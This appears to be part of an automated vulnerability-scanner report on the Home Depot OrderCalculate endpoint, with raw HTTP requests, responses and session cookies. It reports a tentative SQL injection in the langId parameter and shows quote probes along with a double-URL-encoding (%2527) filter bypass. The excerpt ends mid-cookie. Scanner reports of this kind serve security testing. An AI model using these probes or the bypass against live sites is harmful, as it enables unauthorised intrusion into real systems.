Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:41:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:41:17 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224466568%3a%3bC25%5fEXP%3d1360064466%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:06 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224466568%3a%3bC25%5fEXP%3d1360064466%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:12 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%2244%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%2462%2c556%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816472%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224466568%3a%3bC25%5fEXP%3d1360064466%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:12 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228072822%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cCtHCPHu0Jmb4ir2hrdcn6I4AQiE%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus''&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:41:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:41:18 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224478075%3a%3bC25%5fEXP%3d1360064478%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:41:18 GMT;Path=/


1.71. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [langId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The langId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the langId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the langId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1%2527&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:50:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:50:54 GMT
Content-Length: 207104
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225043863%3a%3bC25%5fEXP%3d1360065043%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:43 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225043863%3a%3bC25%5fEXP%3d1360065043%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:50 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22127%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24178%2c673%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817050%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225043863%3a%3bC25%5fEXP%3d1360065043%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:50 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228650014%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cQXMNOazhQVxkiPYFRtIAMF0I8wc%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1%2527%2527&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; 